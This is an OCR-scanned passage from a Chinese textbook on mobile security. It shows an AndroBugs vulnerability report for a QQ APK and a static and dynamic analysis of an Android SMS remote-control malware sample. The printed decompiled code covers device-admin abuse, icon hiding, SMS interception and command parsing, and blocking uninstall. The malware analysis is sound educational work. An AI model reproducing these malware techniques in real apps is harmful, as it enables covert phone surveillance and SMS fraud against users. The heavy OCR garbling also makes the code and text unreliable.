Package Version Code: 29 
Min Sdk: 5 
Target Sdk: 8 
MD5 : 7599801d7110c800e2ad95e5392402e8 
SHA1 : 7810984ca43bb31243bbe3559ee7d9a0e82549d4 
SHA256: 118d733ce4c3a0c363a9da2b938917762f6fd46c427d96f3da627740c8994654 
SHA512: ceelad0a2e5c790e78663f3116af493e56a2569f993a4fc325c2964ce82127f fb42c7b6a2b66f510a 
6eSefcbd66a688672ee0d5f490e8466502c4b2494363d03 
[Critical] «Command» Runtime Command Checking 
This app is using critical function 'Runtime.getRuntime().exec("...")'. 
Pldase confirm these following code secions are not harmful: 
=> Lcom/tencent/mobileqg/utils/traceroute/TraceThread; -»c( 
Ljava/lang/String;)Ljava/lang/String; (exc) ---» 

Ljava/lang/Runtime; -»exec(Ljava/lang/String;)Ljava/lang/Process; 
=> Lcom/tencent/mobileqqg/utils/traceroute/TracerouteInstaller;-» 
installExecutable(Landroid/content/Context;)Z (0x62) ---» 

Ljava/lang/Runtime; -»exec(Ljava/lang/String; )Ljava/lang/Process; 
=> Lcom/tencent/mobileqq/utils/traceroute/TracerouteInstaller;-» 
isTracerouteInstalled()Z (9xe) ---» 

Ljava/lang/Runtime; -»exec(Ljava/lang/String;)Ljava/lang/Process; 
=> Lmqg/util/NativeUtil; -»screenshot(Landroid/content/Context;) 
Landroid/graphics/Bitmap; (0x22) ---» 

Ljava/lang/Runtime; -»exec(Ljava/lang/String;)Ljava/lang/Process; 

[Critical] «Command» Runtime Critical Command Checking: 
Requesting for "root" permission code sections 'Runtime.getRuntime().exec("su 
)' found (Critical but maybe false positive): 
=> Lmqg/util/NativeUtil; -»screenshot(Landroid/content/Context;) 
Landroid/graphics/Bitmap; (0x22) ---» 
Ljava/lang/Runtime; -»exec(Ljava/lang/String;)Ljava/lang/Process; 

















图 11-48  Androbugs 对 qq. apk 生成 的 检测 报告 (部 分 ) 


sa 
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其 中 SSL Implementation Checking 项 的 检测 报告 如 图 11-49 所 示 , 从 图 中 可 以 看 
出 ,此 qq. apk 在 com/tencent/open/util/ HttpBaseUtil 类 的 getHttpClient 方法 中 使 用 了 
ALLOW ALL HOSTNAME VERIFIER 字段 。 





[Critical] «SSL Security» SSL Implementation Checking (Verifying Host Name in Fields): 
This app does not check the validation of the CN(Common Name) of the SSL 
certificate ("ALLOW ALL HOSTNAME VERIFIER" field or 
"AllowAllHostnameVerifier" class). 

This is a critical vulnerability and allows attackers to do MITM attacks with 
his valid certificate without your knowledge. 

Case example: 

(1)http://osvdb.org/96411 

(2)http: //www.wooyun.org/bugs/wooyun-2010-042710 

(3)http://www.wooyun .org/bugs/wooyun-2010-052339 

Also check Google doc: http://developer.android.com/training/articles/security 
-ssl.html (Caution: Replacing HostnameVerifier can 

be very dangerous). 

OWASP Mobile Top 10 doc: https://www.owasp.org/index.php/Mobile Top 10 2014-M3 
Check this book to see how to solve this issue: http://goo.gl/BFb6Sr 


To see what's the importance of Common Name(CN) verification. 
Use Google Chrome to navigate: 

~ https://www.google.com => SSL certificate is valid 

- https://60.199.175.158/ => This is the IP address of google.com, but the 
CN is not match, making the certificate invalid. You 

still can go Google.com but now you cannot distinguish attackers from normal 
users 


Please check the code inside these methods: 
=> Lcom/tencent/open/util/HttpBaseUtil;-»getHttpClient (Ljava/lang/String; 
Ljava/lang/String;)Lorg/apache/http/client/HttpClient; 











图 11-49 SSL Implementation Checking 项 的 检测 报告 


3. 样本 分 析 总 结 
节 首先 介绍 了 Android 应 用 软件 的 一 类 常见 漏洞 一 一 SSL 漏洞 的 原理 和 检测 方 
法 ,然后 通过 使 用 Androbugs 框架 ,演示 了 针对 应 用 程序 进行 安全 漏洞 挖掘 的 方法 ,并 发 
现 了 分 析 目 标 存 在 SSL 实现 高 危 漏洞 ,面临 着 中 间 人 攻击 的 风险 。 


1152 恶意 应 用 分 析 


1. 样本 基本 信息 
恶意 样本 的 基本 信息 如 表 11-4 所 示 。 
表 11-4 恶意 样本 的 基本 信息 


























病毒 名 称 nhndhsjogrrn. spneuvdmpjrk. gociwsfmlaio 
文件 名 称 10086. apk 

文件 MD5 73c19b0742804ec2cd4cbdd3f10b7378 
安装 名 称 移动 客户 端 

文件 大 小 221 636B 

发 现时 间 2015. 9. 18 

影响 系统 Android 

危害 属性 远程 控制 .隐私 窃取 
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2. 样本 症状 描述 

恶意 样本 安装 到 手机 上 后 ,具有 如 下 的 症状 : 

。 病毒 初次 启动 时 ,在 后 台 静 默 发 送 短信 。 

。 隐藏 桌面 图 标 , 在 获取 设备 管理 器 权限 后 ,从 已 安装 程序 列表 中 消失 。 

。 接收 短信 控制 指令 ,拦截 指定 号 码 的 短信 。 

* 病毒 利用 系统 设备 管理 器 的 漏洞 ,使 得 无 法 禁用 该 病毒 ,并 无 法 印 载 。 

3. 静态 分 析 

首先 ,使 用 ApkTools, Androguard, dex2jar 等 静态 分 析 工 具 分 析 样 本 , 反 编 译 、 提 取 
样本 的 代码 .权限 资源 等 信息 。 该 样本 申请 的 权限 列表 如 图 11-50 Bron 。 





<uses-permission android: name=" android. permission. INTERNET" ></uses-pemission> 
<uses-permission android: nane=" android permissicn.READ SMS'»X/uses-permission? 
<uses-permission android: name=" android permission. WRITE_SMS”></uses-permissionò 
<uses-permission android: name=” android permission. SEND_MS” X</uses-pemission> 
<uses-permission android: name=" android permission. RECEIVE SMS" ^ 4/uses-permissior? 
<uses-permission android: name=" android permission. RECEIVE_WAP_PUSH" ></uses-permission> 
<uses-permission android: name=" android permission.RECEIVE BOOT COMPLETED" ></uses-permission)! 
<uses-permission android: name=” android permission. RECEIVE USER PRESENT" »«/uses-pernission? 
(uses-permission android: names" android. permission. READ PHONE STATE" »«/uses-permission? 
Kuses-permission android: name=” android permission. MODIFY AUDIO SETTINGS"»4/uses-permission» 
Xuses-permission android: name=" android. permission.READ OONTACTS^»4/uses-permi ssion» 


uses-pernission android: name-" android permission. VRITE SETTINGS «/uses-permissian? 
uses-pernission android name-" android permissian. VIBRATE”) 4/uses-permission 


Kuses-permission android: name=" android permission. A(CESS NETWORK STATE" »«/uses-pernission? 
Kuses-pernission android nane=" android permission. VRITE EXTERNAL STORAGE" »«/uses-pernissian? 








图 11-50 权限 列表 





可 以 看 到 ,样本 申请 了 网 络 访 问 、 读 取 通 讯 录 、 读 取 短信 ,发 送 短信 、 开 启 自动 启 等 权 
限 , 从 申请 的 权限 来 判断 ,该 恶意 样本 有 可 能 是 隐私 窃取 或 资费 消耗 类 的 恶意 应 用 。 
图 11-51 是 样本 的 组 件 资源 信息 。 


wXactivity android excludeFramRecents-"false" android TSDeT WIFÜG0U0U" android name=” con phone, stop. activity. NainActivity 7 
v Gintert-filter) 
《action android: nanee "android. intent. action. MAIN” >¢/action> 
Ccategory android:names" android, intent. category. LAUNCHER” </category> 
/intent-filter> 
activity 
v Cactivity android:excludeFromRecents-"false" android: labele"8TF060000" android name=" com. phone. stop. activity. DeleteActivity") 
> Gintent-tilter?.. .</intent-filter> 
activity) 
(service android: exportede"true^ android: name=" com. phone. stop. service. BootService^» ( service? 
wreceiver android .namee"com.phone. stop. receiver.BootReceiver > 
vintent-filter android: priority-" 21474836477» 
《action android name "android. intent. action.BOOT OONPLETED" >C/action> 
faction android: nan oid. net. conn. CORNECTIVITY CHANSE” ></actionò 
《action android: names "android. provider. Telephony. MS_REŒIVED"></action> 
<action android:nane="android. provider. Telephony. GSM MS_RECEIVED"></action> 
<action android:nane="android. provider. Telephony. SIS RECEIVED 2'»4/action? 
<action android:nsmem" android. provider. Telephony. SIS DELIVER' >C/actiony 
/intent-filter> 
4/receiver) 
wreceiver android:nme="con. phone. stop. receiver. SNSReceiver” android: permissicn"" android permission. BROADCAST SMS"; 
vw Cintent-filter android: priority- 21474836417» 











(action android:name-^ android. provider. Telephony. SMS KECEIVED'»4/ action? 
/intent-filter> 
receiver» 
wíxeceiver sndroid:nsme-"com.phone. stop. receiver.MyDeviceAdainReceiver^ android permission-"android. permission.BIND DEVICE ADKIN"»| 
neta-data android name=" android spp.device adain" android resources" GTF40000" »«/net a- data? 
v Gintent-filter» 
<action android:nemem"android, app. action. DEVICE ADNIN ERABLED^)4/ action» 
<fintent-filter> 
receiver) 











图 11-51 组 件 资源 信息 
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从 组 件 信 息 中 可 以 看 到 ,样本 的 主 Activity 是 com. phone. stop. activity. 
MainActivity, 并 且 创 建 了 一 个 接收 手机 启动 .连接 状态 改变 等 事件 的 广播 接收 器 com. 
phone. stop. receiver. BootReceiver. 同时 也 创建 了 一 个 后 台 服 务 com. phone. stop. 
service. BootService。 

此 外 ,要 特别 注意 的 是 ,该 样本 申请 了 另外 两 个 较为 敏感 的 广播 接收 器 : com. phone. 
stop. receiver. SMSReceiver 和 com. phone. stop. receiver. MyDeviceAdminReceiver。 前 者 用 于 
响应 短信 接收 事件 ,可 用 于 监听 短信 ;后 者 负责 接收 设备 管理 器 激活 事件 ,而 有 一 类 Android 
恶意 代码 会 通过 诱 使 用 户 给 予 它 设备 管理 器 权限 而 隐藏 自身 ,并 阻止 用 户 秃 载 。 

接 下 来 查看 反 编译 后 的 代码 ,首先 分 析 程 序 入 口 Activity: com. phone. stop. 
activity. MainActivity, 部 分 代码 如 图 11-52 所 示 。 
public class MainActivity extends Activity { 


public static String a; 
Handler b; 





static ( 
MainActivity.a = "18831880141"; 
) 


public MainActivity() { 
super(); 
this.b = new b(this); 
) 


public void a() ( 
try { 
Object v0_1 = this.getSystemService("device policy"); 
ComponentName vl = new ComponentName(((Context)this), MyDeviceAdminReceiver.class); 
if(((DevicePolicyManager)vO 1).isAdminActive(vl)) { 
return; 
) 


Intent v0 2 = new Intent("android.app.action.ADD DEVICE ADMIN"); 
v0, 2.putExtra("android.app.extra.DEVICE ADMIN", ((Parcelable)vi)); 


v0 2.putExtra("android.app.extra.ADD EXPLANATION", "提高 权限 获取 保护 "); 
this.startActivityForResult(vO 2, 0); 
this.b.sendEmptyMessageDelayed(1, 2000); 





) 

catch(Exception v0) { 
v0.printStackTrace(); 

) 














图 11-52 反 编 译 代码 


从 图 11-53 的 代码 片段 中 可 以 看 到 ,该 样本 在 主 Activity 启动 后 会 发 起 激活 自身 为 
设备 管理 器 的 请 求 ,如 图 11-53 所 示 。 

同时 ,样本 会 将 主 Activity 的 状态 设置 为 Disable, 即 可 达到 隐藏 桌面 图 标的 目的 , 结 
合 上 一 步 ,在 获取 设备 管理 器 权限 后 .样本 会 自动 从 已 安装 程序 列表 中 消失 ,达到 了 隐藏 
自身 的 目的 。 

下 面 继续 分 析 短 信和 广播 接收 器 com. phone. stop. receiver. SMSReceiver 的 代码 。 广 
播 接收 器 在 接收 到 所 注册 类 型 的 广播 后 ,会 触发 onReceive 回调 ,这 也 是 广播 接收 器 的 人 
口 函 数 ,如 图 11-54 所 示 o 
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protected void onCreate(Bundle argS) { 
super.onCreate (arg5) ; 
this.setContentView(2130903041); 





i.b(((Context)this)); 
i.c(((Conzexz)this)); 
i.d(((Context) this) ) 
i.e(((Context) this); 
if(!a.a(((Context)this)).1()) { 
x.a(" 软 件 安装 完毕 \n 识 别 码 :”+ this.getSystemService("phone").getDeviceId() + "Wn" + j.a(), 4, ((Context) 
this)); 
a.a(((Conzext) this) ) .e (true) ; 


) 


k.a(((Context) this)); 

if(a.a(((Conzext)this)).3()) { 
d.a(((Conzext) this)); 

) 


this.a(); 








图 11-53 ”激活 设备 管理 器 请 求 代码 


public void onReceive(Context arg2, Intent arg3) { 





图 11-54 广播 接收 代码 


可 以 看 到 ,在 接收 到 短信 广播 后 ,样本 调用 了 方法 a(Intent arg)。 该 方法 的 作用 是 从 
接收 到 的 Intent 中 提取 短信 的 发 件 人 、 短 信 内 容 等 信息 ,而 后 调用 男 一 个 方法 a(String 
argl. String arg2. String arg3) ,如 图 11-55 所 示 ,关键 代 码 用 方 框 标 出 。 

随后 ,方法 a(String argl. String arg2. String arg3) 会 调用 a(String argl. String 
arg2) 方 法 ,如 图 11-56 所 示 。 

a(String argl. String arg2) 方 法 需要 重点 分 析 , 其 部 分 代码 如 图 11-57 Bros 

可 以 看 到 ,该 方法 使 用 if(arg8. contains(a. aCthis. a). c())) 作 为 判断 条 件 ,如 果 条 件 
通过 , 则 判断 “是 主人 ”, 也 就 是 认为 是 远程 控制 端 发 回 的 控制 指令 。 在 远程 控制 类 恶意 代 
码 的 分 析 中 ,控制 指令 的 解析 十 分 重要 。 我 们 继续 分 析 方 法 a. a(this. a). cO KWE EHE 

从 图 11-58 中 的 代码 可 知 ,a. aCthis. a). c() 方 法 是 从 SharedPreferences 中 读 取 Key Jg i_ 
want_xxoo 的 值 并 将 其 返回 ,然而 , 读 取 行为 的 默认 值 为 f810d07472214f3ecaafc4d23437130. 
动态 运行 可 以 发 现 , 该 值 并 不 能 通过 上 一 步 的 条 件 检 查 , 因 此 可 以 推测 该 方法 对 字符 串 进行 
了 加 密 处 理 , 而 由 于 SharedPreferences 的 存在 ,使 得 通过 静态 分 析 直接 恢复 出 解密 后 的 字符 
串 较 为 困难 ,因此 ,我 们 将 采用 编写 Xposed 插件 的 方式 动态 地 提取 出 解密 后 的 内 容 ,这 将 在 
下 面 的 动态 分 析 部 分 中 详细 介绍 。 

至 此 ,初步 的 静态 分 析 就 完成 了 ,分 析 过 程 中 ,使 用 了 ApkTools、Androguard、 
dex2jar 等 静态 分 析 工 具 反 编译 、 提 取出 样本 的 代码 ,权限 、 组 件 资源 等 数据 ,并 通过 样本 
申请 的 权限 和 组 件 初 步 判 断 样本 类 型 ,而 后 从 入 口 Activity、BroadcastReceiver 出 发 ,分 
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private void a(Intent argl1) { 
String vi; 
String v0 2; 
Bundle v0 = argll.getExtras(); 
StringBuffer v6 = new StringBuffer(); 
String v3 = ""; 
String v2 = ""; 
if(vO != null) ( 








int v5; 
for(vS = 0; v5 < v8; v5) { 

VI[vS] = SusMessage.createFromPdu(vO 1[v$]); 
) 


V5 = v7.length; 
v02 = v2; 
vi v3: 
int v2 1 = 0; 
while(v2 1 < v5) { 
SmsMessage v0 3 = v7[v2 1]; 
v3 = v0 3.getDisplayOriginatingAddress():; 
String v4 = v0 3.getMessageBody():; 
Vl = new StringBuilder(String.valueOf(vO 3.getTimestampMillis())).toString(); 
v6.append(v4); 
"21; 
v0 2 = vi; 
vi v3; 














图 11-55 短信 广播 处 理 代码 





private void a(String arg3, String arg4, String arg5) [| 
String vO = a.a(this.a).c():; 
if(!vO.contains("7243")) { 
return; 
) 


if(this.a(arg3, arg4)) ( 


return; 


) 











图 11-56 方法 调用 关系 代码 


析 具 体 的 代码 ,初步 判定 该 样本 为 接收 短信 指令 的 远程 控制 类 样本 ,并 发 现 控制 指令 经 过 
加 密 保 护 。 下 面 将 使 用 动态 分 析 的 方法 提取 实际 的 控制 指令 。 

4. 动态 分 析 

首先 ,编写 Xposed 插件 ,动态 提取 加 密 后 的 控制 指令 。Xposed 框架 的 相关 介绍 请 参 
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private boolean a(String arg8, String arg9) { 
int v6 = 4; 
int v5 = 2; 


boolean v0 = true; 


g-a("-- 一 -~-- 征 王 人 -一 -一 -一 "i 
this.a(arg9); 
String[] v2 = arg9.split(" "); 
if(v2[0].equals("L2")) [ 
if(v2[1].equals("ALL")) { 
a.a(this.a).a(1); 
return v0; 

















图 11-57 条 件 判断 代码 





public class a [ 
private static a a; 
private SharedPreferences b; 


public String c() { 
return this.b.getString("i want xxoo", "f8f0d0747221a4f3ecaafc4d23437£30") ?| 
) 





图 11-58 字符 串 获取 代码 


见 11.4.4 节 。 

编写 Xposed 插件 的 目的 是 提取 解密 后 的 SharedPreferences. getString() 的 返回 值 ， 
因此 需要 与 Hook 相对 应 的 接口 函数 。 

第 一 步 ,创建 一 个 类 DemoModule 并 实现 IXposedHookLoadPackage 接口 ,代码 
如 下 : 


public class DemoModule implements IXposedHookLoadPackage { 
@ Override 


public void handleLoadPackage (final XC LoadPackage.LoadPackageParam 
lpparam) ( 
// 该 接口 会 在 载 人 app 的 时 候 调用 


Y 


58 — 3b. 分 析 Android 系统 源码 ,定位 合适 的 Hook 点 。 经 过 分 析 发 现 ， 
SharedPreferences. getString (String argl. String arg2) 函数 最 终 会 调用 android. app. 
SharedPreferencesImpl. getString(String argl. String arg2) ,选取 此 函数 作为 Hook 点 。 

第 三 步 , 在 handleLoadPackage ( ) 函数 中 ,加 入 对 上 述 Hook 的 拦截 。 由 于 
SharedPreferencesImpl 为 内 部 类 ,无 法 直接 通过 SDK 访问 ,因此 需要 使 用 反射 技术 , 相 
关 代 码 如 下 : 

Class spImplClass=Class.forName ("android.app.SharedPreferencesImpl"); 

Method spGetStringMethod = spImplClass. getMethod (" getString", String. class, String. 
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class); 

第 四 步 ,获取 Hook 点 函数 的 实例 后 ,使 用 添加 Hook。 可 以 在 beforeHookedMethod() 
接口 中 打印 出 函数 调用 参数 ,在 afterHookedMethod() 接 口中 打印 函数 返回 值 。 具 体 的 实现 
代码 请 读者 参考 Xposed 文档 补充 。XposedBridge. hookMethodO 函数 代码 如 下 : 


XposedBridge.hookMethod (spGetStringMethod, new XC MethodHook() { 


@ Override 
protected void beforeHookedMethod (MethodHookParam param) ( 


super.beforeHookedMethod (param) ; 
// 打 印 参 数 
} 


@ Override 
protected void afterHookedMethod (MethodHookParam param) { 


super.afterHookedMethod (param) ; 
// 打 印 返回 值 


n»: 
完成 以 上 4 步 后 ,安装 .激活 我 们 编写 的 DemoModule, 重 启 手机 ,然后 安装 、 运 行 样 
本 程序 ,可 以 从 logcat 读 取 SharedPreferencesImpl. getString O 的 执行 情况 ,如 图 11-59 


所 示 。 


图 11-59 logcat 日 志 


可 以 看 到 该 函数 的 解密 后 返回 值 是 13435270962 ,进一步 分 析 可 知 ,该 样本 在 拦截 到 
新 短信 时 ,会 判断 短信 发 件 人 是 否 包 含 此 字符 串 , 若 包 含 才 实施 恶意 行为 。 

解密 ,恢复 控制 指令 后 ,可 实际 使 用 TCA 深度 分 析 系 统 、Droidbox 等 动态 分 析 工 具 
对 样本 进行 恶意 行为 的 触发 分 析 ,部 分 控制 指令 如 下 : 

* SEND 10086 content。 样 本 拦截 此 短信 ,并 向 10086 发 送 内 容 为 content 的 短信 。 








if(!v2[0].equals ("SEND")) { 


return v0; 


try ( 
k.a(v2[1], v2[2], this.a); 


public static void a (String arg6, String arg7, Context arg8) ( 
SmsManager v0- SmsManager .getDefault () ; 
v0.sendMultipartTextMessage (arg6, null, v0.divideMessage (arg7), null, null); 
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* LJ ALL/SOME/NO. 样本 拦截 此 短信 ,设置 短信 拦截 类 型 ,有 ALL、SOME、NO 


3 种 。 


if(v2[0].equals("LJ")) ( 
if(v2[1].equals ("ALL")) ( 
a.a(this.a).a(1); 


return v0; 


if(v2[1].equals ("SOME")) { 
a.a(this.a).a(v5); 


return v0; 


if(!v2[1].equals ("NO")) ( 


return v0; 


a.a(this.a).a(3); 


return v0; 


public void a(int arg3) ( 
SharedPreferences$ Editor vO0-this.b.edit(); 
v0.putInt("app intercept type", arg3); 
vO.commit () ; 


) 


* ADD 10086。 样 本 拦截 此 短信 ,并 将 10086 添加 到 病毒 本 地 保存 的 拦截 号 码 数据 


库 中 。 


if(v2[0].equals ("ADD") ) { 
c vl=new c(); 
vl.c=v2[1]; 
b.a (v1); 


return v0; 


public static boolean a (c arg4){ 
SQLiteDatabase v0=a.a (PhoneApplication.a () 
ContentValues vl=newContentValues () ; 
v1.put ("number", arg4.c) ; 


vl.put ("name", arg4.b); 
vl.put ("created time",f.a("-")); 


vl.put ("modified time", f.a("-")); 


) -getWritableDatabase (); 
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boolean v0 1-v0.insert("intercept person", null, v1)« 0? false:true; 
return vO 1; 


) 


此 外 ,该 样本 获取 设备 管理 器 权限 后 ,不 能 直接 在 “设置 "~ 应 用 程序 管理 "中 仓 载 ， 
需 先 在 “设置 ”>“ 安 全 ”一 “设备 管理 器 ”中 禁用 此 样本 。 但 该 样本 利用 系统 设备 管理 器 的 
漏洞 ,使 得 无 法 禁用 该 病毒 的 设备 管理 器 权限 ,加 大 了 印 载 难度 。 


public CharSequence onDisableRequested (Context arg3, Intent arg4)( 
this.a(arg3,arg4); 
Log.i ("Ray", "onDisableRequested") ; 
return "谨慎 操作 ! 取消 激活 可 能 会 影响 手机 正常 使 用 ."; 

} 


private void a (Context arg4, Intent arg5) { 
Intent v0 = arg4. getPackageManager ( ). getLaunchIntentForPackage ( " com. android. 
settings"); 
v0.setFlags (268435456); 
arg4.startActivity (v0); 
int v0_1=0; 
while(vO 1«4)( 
long v1= 3000; 
try{ 
Thread.sleep (v1); 
*tvO 1; 
continue; 
]catch (InterruptedException vO 2)í 
v0 2.printStackTrace(); 


return; 


) 


5. 样本 分 析 总 结 

通过 综合 运用 属性 分 析 、 权 限 分 析 、 静 态 代码 分 析 、Hook 技术 、 动 态 分 析 等 方法 ,可 
以 发 现 该 样本 是 一 款 Android 平台 病毒 , 它 伪装 成 正常 软件 ,请求 设备 管理 器 权限 ,第 一 
次 运行 后 隐藏 图 标 , 在 后 台 接收 短信 控制 指令 ,执行 隐私 窃取 ,同时 阻止 用 户 印 载 。 


11.6 小 结 
手机 平台 含有 大 量 高 价值 的 隐私 数据 ,如 通讯 录 ,短信 人、 通话 记录 等 ,并 且 随 着 智能 手 


机 功能 的 逐步 扩展 ,目前 已 经 有 部 分 手机 具有 手机 支付 等 功能 ,因此 手机 安全 受到 越 来 越 
多 的 关注 ,智能 手机 平台 也 成 为 恶意 软件 攻击 的 重点 目标 。 鉴 于 移动 平台 ,尤其 是 
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Android 平台 面临 的 严重 安全 威胁 ,Android 平台 安全 研究 已 经 成 为 移动 安全 领域 研究 
的 重点 。 传 统 PC 平台 的 恶意 代码 分 析 技 术 , 如 基态 代码 分 析 、 数 据 流 分 析 \ 动 态 行为 分 
析 等 在 Android 平 台 上 也 有 相应 的 应 用 ,知名 的 面向 PC 恶意 代码 的 分 析 工 具 ,如 Pin, 
Panda, Soot 等 也 推出 了 可 用 于 Android 的 版 本 。 


除 此 之 外 ,针对 Android 系统 自身 的 特点 ,发 展 出 了 属性 分 析 、 权 限 分 析 、 组 件 分 析 等 


有 别 于 传统 PC 领域 代码 的 分 析 方 法 。 本 章 详 细 描 述 了 上 述 方法 的 最 新 研究 动态 ,并 介 
绍 了 多 种 典型 的 安全 分 析 工 具 , 最 后 以 应 用 程序 安全 漏洞 挖掘 和 恶意 代码 分 析 两 个 实际 
案例 ,综合 利用 了 本 章 涉 及 的 方法 及 工具 ,展示 了 典型 的 移动 智能 终端 应 用 软件 安全 性 分 





析 流 程 。 
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